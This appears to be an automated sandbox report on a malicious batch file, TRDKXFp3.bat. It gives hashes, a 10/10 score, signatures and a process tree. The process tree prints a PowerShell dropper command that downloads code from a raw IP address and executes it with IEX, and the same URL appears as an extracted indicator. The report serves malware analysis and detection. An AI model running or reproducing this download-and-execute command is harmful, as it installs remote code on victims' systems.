Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
02-04-2020 03:10
General
-
Target
TRDKXFp3.bat
-
Size
197B
-
MD5
9727c80f12d3336f330b3688e052968e
-
SHA1
a20e98c967b46f66b2c7ebb51739ea41636b7f79
-
SHA256
352f20fc1f8b8354ab0f610f5fdb66c11e24d56ba92f323df35200a0939ba674
-
SHA512
faf8e17c7858c3163621f74dc918b491b591c9f99c9351d904b4653be79148e9495ad07e94f82a56506e132fbb4b256fdd36b1da0659fad778ef36369ee12bd6
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/TRDKXFp3
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TRDKXFp3.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/TRDKXFp3');Invoke-YFVHLQKGBYBAEA;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3084-0-0x0000000004D40000-0x0000000004D41000-memory.dmpFilesize
4KB
-
memory/3084-1-0x00000000054F0000-0x00000000054F1000-memory.dmpFilesize
4KB